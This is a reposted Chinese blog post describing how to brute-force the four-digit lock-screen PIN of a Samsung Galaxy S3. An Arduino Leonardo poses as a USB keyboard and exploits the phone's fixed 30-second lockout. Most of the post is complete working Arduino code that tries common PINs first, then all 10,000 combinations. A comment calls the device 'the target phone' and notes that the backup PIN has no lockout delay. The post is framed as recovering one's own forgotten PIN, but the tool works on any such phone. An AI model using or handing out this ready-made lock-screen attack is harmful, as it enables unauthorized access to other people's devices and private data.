转载自:http://www.alsrobot.cn/article-572.html 、https://www.zybuluo.com/plantpark/note/26852
使用过安卓手机的小伙伴们肯定会有些惨痛经历,经常会忘记手机解锁图形和PIN码,但如果通过Root等方式破解手机恐怕再也无法得到官方保修,这里就介绍一种方法安全的破解它!
使用过安卓手机的小伙伴们肯定会有些惨痛经历,经常会忘记手机解锁图形和PIN码,但如果通过Root等方式破解手机恐怕再也无法得到官方保修,这里就介绍一种方法安全的破解它! 三星Galaxy S3手机在输错5次PIN码后,会要求等待30s然后重新输入,幸运的是,每次输错都会要求等待30s,这等待时间并不会更改,这就给了hack的机会。
因为Arduino Leonardo可以作为HID设备模拟键盘通过USB OTG连接到手机,在这里我就选用了Leonardo,文章末尾有详细的代码。为了减少破解时间,可以把自己常用的密码或者数字组合优先测试。
当然,三星Galaxy S3手机的PIN码只有四位,如果从0000一直尝试到9999大概只需要16个小时,如果你的手机碰巧是小米手机,PIN码又碰巧设了17位,那你就果断Root吧~~
代码如下:
/*
Brute forcing Android 4 Digit PIN's
To run the whole range it will take upwards of 16 hours because of
the 30 second delay after 5 bad inputs
Intrestingly, if the target phone has the pattern enabled
and the backup PIN set, the backup PIN entry system doesn't force the 30 second delay after
invalid attempts
http://blog.infosecsee.com */
const int buttonPin = 2; // input pin for pushbutton
int previousButtonState = HIGH; // for checking the state of a pushButton
int counter = 0; // button push counter
int check = 0;
void setup() {
pinMode(buttonPin, INPUT);
Keyboard.begin();
}
void loop() {
int buttonState = digitalRead(buttonPin);
if ((buttonState != previousButtonState) && (buttonState == HIGH)) {
Mouse.move(25, 50, 0);
String three = "000";
String two = "00";
String one = "0";
while(counter < 10000){
delay(1000);
while (check < 1){
Keyboard.println("1234");
delay(500);
Keyboard.println("1111");
delay(500);
Keyboard.println("0000");
delay(500);
Keyboard.println("1212");
delay(500);
Keyboard.println("7777");
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
Keyboard.println("1004");
delay(500);
Keyboard.println("2000");
delay(500);
Keyboard.println("4444");
delay(500);
Keyboard.println("2222");
delay(500);
Keyboard.println("6969");
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
Mouse.move(25, 50, 0);
Keyboard.println("9999");
delay(500);
Keyboard.println("3333");
delay(500);
Keyboard.println("5555");
delay(500);
Keyboard.println("6666");
delay(500);
Keyboard.println("1122");
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
Keyboard.println("1313");
delay(500);
Keyboard.println("8888");
delay(500);
Keyboard.println("4321");
delay(500);
Keyboard.println("2001");
delay(500);
Keyboard.println("1010");
delay(500);
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
check++;}
if (counter < 10 && check == 1) {
Keyboard.println(three + counter);
delay(500);
counter++;
Keyboard.println(three + counter);
delay(500);
counter++;
Keyboard.println(three + counter);
delay(500);
counter++;
Keyboard.println(three + counter);
delay(500);
counter++;
Keyboard.println(three + counter);
delay(500);
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
}
else if (counter < 100){
Keyboard.println(two + counter);
delay(500);
counter++;
Keyboard.println(two + counter);
delay(500);
counter++;
Keyboard.println(two + counter);
delay(500);
counter++;
Keyboard.println(two + counter);
delay(500);
counter++;
Keyboard.println(two + counter);
delay(500);
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
}
else if (counter < 1000){
Keyboard.println(one + counter);
delay(500);
counter++;
Keyboard.println(one + counter);
delay(500);
counter++;
Keyboard.println(one + counter);
delay(500);
counter++;
Keyboard.println(one + counter);
delay(500);
counter++;
Keyboard.println(one + counter);
delay(500);
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
}
else {
Keyboard.println(counter);
delay(500);
counter++;
Keyboard.println(counter);
delay(500);
counter++;
Keyboard.println(counter);
delay(500);
counter++;
Keyboard.println(counter);
delay(500);
counter++;
Keyboard.println(counter);
delay(500);
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
}
}
}
previousButtonState = buttonState;
}